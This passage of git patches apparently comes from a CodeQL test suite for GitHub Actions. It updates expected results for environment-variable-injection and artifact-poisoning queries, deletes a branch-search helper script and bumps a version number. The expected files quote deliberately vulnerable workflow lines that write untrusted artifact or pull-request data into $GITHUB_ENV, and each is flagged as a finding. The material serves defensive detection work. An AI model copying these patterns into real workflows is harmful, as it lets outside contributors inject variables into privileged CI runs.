.github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | 
@@ -79,6 +94,11 @@ nodes | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable 
injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 1ac092dd0d3b..23bc7784f760 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | 
@@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| 
.github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7aa170a2e988..7a59ab6ec60d 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes 
@@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | 
@@ -62,9 +53,6 @@ subpaths | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 8d9465077995..2ed89bcb4bc5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes 
@@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | From 7fa77e2728eead10408dbfa5d076e8f4b25ce8cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:05:00 +0200 Subject: [PATCH 582/707] Delete test script --- search_branches.py | 88 ---------------------------------------------- 1 file changed, 88 deletions(-) delete mode 100644 search_branches.py diff --git a/search_branches.py b/search_branches.py deleted file mode 100644 index d0036169fea3..000000000000 
--- a/search_branches.py +++ /dev/null 
@@ -1,88 +0,0 @@ -import base64 -import os -import re -import sys -import time - -import requests - - -def handle_rate_limit(response, wait_time=60): - return False - - -def search_branches(repo_nwo, file_path, regex_pattern): - # GitHub API base URL - base_url = "https://api.github.com" - - # Get GitHub token from environment variable - github_token = os.environ.get("GITHUB_TOKEN") - if not github_token: - print("Error: GITHUB_TOKEN environment variable not set") - sys.exit(1) - - # Set up headers for authenticated requests - headers = { - "Authorization": f"token {github_token}", - "Accept": "application/vnd.github.v3+json", - } - - # Get all branches (with pagination) - branches_url = f"{base_url}/repos/{repo_nwo}/branches" - branches = [] - while branches_url: - branches_response = requests.get(branches_url, headers=headers) - if handle_rate_limit(branches_response): - continue - branches_response.raise_for_status() - branches.extend(branches_response.json()) - branches_url = branches_response.links.get("next", {}).get("url") - - # Compile the regex pattern - pattern = re.compile(regex_pattern) - - # Search file contents in each branch - for branch in branches: - branch_name = branch["name"] - file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}" - - while True: - file_response = requests.get(file_url, headers=headers) - - if file_response.status_code == 200: - file_content = file_response.json()["content"] - - decoded_content = base64.b64decode(file_content).decode("utf-8") - - if pattern.search(decoded_content): - print(f"Match found in branch: {branch_name}!!!!!") - else: - print(f"No match found in branch: {branch_name}") - break - elif file_response.status_code == 404: - print(f"File not found in branch: {branch_name}") - break - elif ( - file_response.status_code == 403 - and "X-RateLimit-Remaining" in file_response.headers - ): - if int(file_response.headers["X-RateLimit-Remaining"]) == 0: - reset_time = 
int(file_response.headers["X-RateLimit-Reset"]) - sleep_time = reset_time - int(time.time()) + 1 - print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") - time.sleep(sleep_time) - - -if __name__ == "__main__": - if len(sys.argv) != 4: - print("Usage: python search_branches.py ") - sys.exit(1) - - repo_nwo = sys.argv[1] - file_path = sys.argv[2] - regex_pattern = sys.argv[3] - - print( - f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" - ) - search_branches(repo_nwo, file_path, regex_pattern) From 3b95ae0b531c9555bb2318b8f54b556edcce132b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:15:58 +0200 Subject: [PATCH 583/707] Bump QLPacks versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 229b1f81c7be..82891e5c0173 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.66 +version: 0.1.67 dependencies: 